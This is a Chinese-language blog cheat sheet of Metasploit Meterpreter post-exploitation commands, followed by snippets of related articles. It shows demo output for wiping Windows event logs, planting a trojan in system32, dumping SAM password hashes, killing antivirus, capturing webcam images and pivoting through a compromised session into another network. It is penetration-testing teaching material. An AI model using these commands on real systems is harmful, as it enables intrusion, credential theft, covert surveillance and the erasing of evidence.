Meterpreter基础命令

最新推荐文章于 2024-09-30 16:55:37 发布
最新推荐文章于 2024-09-30 16:55:37 发布
阅读量2.3k 收藏 4
点赞数
文章标签: metasploit
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/caiqiiqi/article/details/72748725
版权

参考:
https://www.offensive-security.com/metasploit-unleashed/meterpreter-basics/

help

background

把已打开的session放到后台

cat

输出文件文件内容

cd && pwd

clearev

清除Windows上的应用日志,系统日志,和安全日志

Demo

meterpreter > clearev
[*] Wiping 97 records from Application...
[*] Wiping 415 records from System...
[*] Wiping 0 records from Security...

upload

Demo

meterpreter > upload evil_trojan.exe c:\\windows\\system32
[*] uploading  : evil_trojan.exe -> c:\windows\system32
[*] uploaded   : evil_trojan.exe -> c:\windows\system32\evil_trojan.exe

download

edit

使用vim编辑文本文档

execute

执行可执行文件

Demo

meterpreter > execute -f cmd.exe -i -H
Process 38320 created.
Channel 1 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\WINDOWS\system32>

hashdump

dump the contents of the SAM database

idletime

display the number of seconds that the user at the remote machine has been idle.

ipconfig <=> ifconfig /all

ps <=> tasklist

locate specific files on the target host. The command is capable of searching through the whole system or specific folders.

Demo

meterpreter > search -f autoexec.bat
Found 1 result...
    c:\AUTOEXEC.BAT
meterpreter > search -f sea*.bat c:\\xamp\\
Found 1 result...
    c:\\xampp\perl\bin\search.bat (57035 bytes)

shell

run killav

杀掉杀软

run post/windows/gather/enum_applications

获取安装的软件信息

查看目标机的最近的文件操作

webcam_list

display currently available web cams on the target host.

Demo

meterpreter > webcam_list
1: Creative WebCam NX Pro
2: Creative WebCam NX Pro (VFW)

resource ?

execute Meterpreter instructions located inside a text file. Containing one entry per line, “resource” will execute each line in sequence. This can help automate repetitive actions performed by a user.

By default, the commands will run in the current working directory (on target machine) and resource file in the local working directory (the attacking machine).

webcam_snap

Demo

grabs a picture from a connected web cam on the target system, and saves it to disc as a JPEG image. By default, the save location is the local current working directory with a randomized filename.

得到某个meterperter session之后,将该victim作为进入其所在另一个网络的下一跳,即添加路由。

msf > route help
Route traffic destined to a given subnet through a supplied session.

Usage:
  route [add/remove] subnet netmask [comm/sid]
  route [add/remove] cidr [comm/sid]
  route [get] <host or network>
  route [flush]
  route [print]

Subcommands:
  add - make a new route
  remove - delete a route; 'del' is an alias
  flush - remove all routes
  get - display the route for a given target
  print - show all active routes

Examples:
  Add a route for all hosts from 192.168.0.0 to 192.168.0.0 through session 1
    route add 192.168.0.0 255.255.255.0 1
    route add 192.168.0.0/24 1

  Delete the above route
    route remove 192.168.0.0/24 1
    route del 192.168.0.0 255.255.255.0 1

  Display the route that would be used for the given host or network
    route get 192.168.0.11

先在session中查看路由,

meterpreter > route

查看路由之后,
将得到的session放到background.

meterperter > background

然后添加路由。

meterpreter > route add 10.0.0.0/24 1

即表示所有向10.0.0.0/24的流量都通过session 1转发。

然后可以

use auxiliary/scanner/smb/smb_version

查看一下操作系统版本。
参考:
https://www.youtube.com/watch?v=HDhlP2OjgHU

caiqiiqi
关注
Meterpreter后渗透模块命令字典
m0_57221101的博客
04-14 798
一.系统命令 1.快捷操作 此板块用于记录用于操作meterpreter的指令 sessions #查看全部会话 –h 查看帮助 sessions -i <shell ID> #进入会话 -k 杀死会话 background #将当前会话放置后台 run #执行已有的模块,输入run后按两下tab,列出已有的脚本 info #查看已有模块信息 2.基础系统命令 getuid # 查看权限 getpid # 获取当前进程的pid sysinfo # 查看目标机系
安全小白必看的Windows渗透基础命令大全
05-07 1595
在这里推荐一下我的同名公众号:程序员启航 Windows发展历史 Microsoft Windows,是美国微软公司研发的一套操作系统,它问世于1985年,起初仅仅是DOS模拟环境,后续的系统版本由于微软不断的更新升级,不但易用,也慢慢的成为家家户户人们最喜爱的操作系统。 MS-Dos 版本号 发布时间 Windows1.0 1985.11 Windows2.0 1987.12 Windows2.1 1988 Windows3.0 1990.5 ..
meterpreter环境下的命令
12-13
非常值的一个东西,就是你使用msf平台攻进靶机后的meterpreter下的所有命令集都有详细的讲解,非常好
meterpreter基础命令大全
weixin_30410999的博客
03-08 542
meterpreter meterpreterMetasploit框架中的一个扩展模块,作为溢出成功以后的攻击载荷使用.为后渗透提供了很多便捷之处 基础命令 我们进入meterpreter之后,键入 ? 即可进入帮助文档. 我们进入帮助文档可以看到帮助文档被分成了好几个模块... Core Commands(基础命令) ?              帮助文档 background  ...
Metasploit渗透测试之深度理解Meterpreter
最新发布
YJ_12340的博客
09-30 1632
在之前的教程中,我们更多地是学习了Metasploit的前渗透阶段,我们尝试了各种技术和利用来攻击我们的目标。在本文中,我们将重点介绍Metasploit中最先进的有效负载,以及我们在拿下目标机器shell后可以做什么。为我们提供了许多功能,可以简化我们探索目标机器的任务。我们已经在前面了解了如何使用,在本文节中,我们将详细了解,以及如何将其用作为后渗透阶段的强力工具。使用某些特定payloads有一个主要缺点,即会在受损系统中创建新进程,容易被杀毒软件发现。此外,payloads。
meterpeter命令
weixin_45284423的博客
12-08 88
【代码】meterpeter命令
关于meterprter代码指令以及中文翻译
小飞飞的博客
03-31 693
关于meterprter有哪些指令代码以及代码的描述
meterpreter里面cmd乱码解决方法chcp 65001
sweelg的博客
06-26 1744
当我们使用meterpreter反弹shell后使用是乱码时 可以采用如下命令解决 chcp 65501 chcp是一个计算机指令,能够显示或设置活动代码页编号。 65001 UTF-8代码页 950 繁体中文 936 简体中文默认的GBK 437 MS-DOS美国英语 ...
Metasploit进阶:Meterpreter基础功能与使用
Metasploit简介与Meterpreter概述 ## 1.1 Metasploit框架简介 Metasploit框架是一款功能强大的开源渗透测试工具,旨在帮助安全研究人员和渗透测试人员有效地发现、利用和验证安全漏洞。Metasploit提供了丰富的...
Metasploit Meterpreter命令与功能详解
# 1. Metasploit简介 ## 1.1 Metasploit基本概念 Metasploit是一款开源的渗透测试工具,旨在帮助安全专家识别和利用安全漏洞。它包含了数百种渗透测试工具,Payloads、Exploits等,...## 1.3 Meterpreter简介 Meter
meterpreter 笔记
Cou1d的博客
12-25 433
**第一章:** ```PETS渗透测试流程``` --前期交互--情报搜集--威胁建模--漏洞分析--渗透攻击--后渗透攻击--测试报告撰写 ```渗透测试类型``` 白盒测试:即和客户一起工作,测试者在拥有客户组织所有知识的情况下进行的渗透测试,问题在于无法有效地测试客户组织的应急响应程序,无法判断他们安全防护计划检测特定攻击的效率。减少了情报搜集阶段。 黑盒测试:模拟对客户组织一无...
Meterpreter命令详解
热门推荐
子曰小玖的博客
08-08 1万+
0x01初识Meterpreter 1.1.什么是Meterpreter MeterpreterMetasploit框架中的一个扩展模块,作为溢出成功以后的攻击载荷使用,攻击载荷在溢出攻击成功以后给我们返回一个控制通道。使用它作为攻击载荷能够获得目标系统的一个Meterpreter shell的链接。Meterpreter shell作为渗透模块有很多有用的功能,比如添加一个用户、隐藏一...
msfconsole开启meterpreter
a1_pha的博客
02-20 505
meterpreter是msf框架的一个后渗透工具,在靶机上运行了msfvenom使用相应payload生成的木马后,可通过meterpreter对其进行连接。其中lhost,lport为主机ip及端口。
后渗透之meterpreter使用攻略
钻石
01-06 8479
本文转载来源:https://xz.aliyun.com/t/2536 Metasploit中的Meterpreter模块在后渗透阶段具有强大的攻击力,本文主要整理了meterpreter的常用命令、脚本及使用方式。包含信息收集、提权、注册表操作、令牌操纵、哈希利用、后门植入等。 0x01.系统命令 1)基本系统命令 sessions #sessions –h 查看帮助 sessi...
Meterpreter命令合集(详细)
2302_76986722的博客
09-16 2431
help# 查看Meterpreter帮助background#返回,把meterpreter后台挂起bgkill# 杀死一个 meterpreter 脚本bglist#提供所有正在运行的后台脚本的列表bgrun#作为一个后台线程运行脚本channel#显示活动频道sessions -i number # 与会话进行交互,number表示第n个session,使用session -i 连接到指定序号的meterpreter会话已继续利用sesssions -k number #与会话进行交互。
Meterpreter基本命令详解
小人物的博客
05-14 2768
基本命令 1.background 命令 &amp;nbsp;&amp;nbsp; 将Meterpreter终端隐藏在后台 2.sessions 命令 &amp;nbsp;&amp;nbsp;查看已经成功获取的会话 3.quit 命令 &amp;nbsp;&amp;nbsp; 直接关闭当前的Meterpreter命令 4.shell 命令 &amp;nbsp;&amp;nbsp;可以获取系统的控制台Shell,如果目标系统上的命
12、后渗透测试--meterpreter使用
无痕的博客
12-13 1390
metasploit后渗透阶段meterpreter命令
Metasploit(三) Meterpreter基础知识
u010680986的博客
08-29 1863
攻击前期步骤: 1. 启动msfconsole:命令行输入use exploit/windows/smb/ms08_067_netapi 2. 可以通过show options查看设置的条件,默认远程主机不会有内容,需要手动设置,通过set RHOST ip 进行设置目标主机地址,端口也可以设置,设置完成后,可以看到如下图,上面是目标主机的ip和端口信息,下面是本地信息 3. 设置完毕后,输入exploit就可以进入meterpreter shell 基本命令 输入help可以查看所有Met.
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值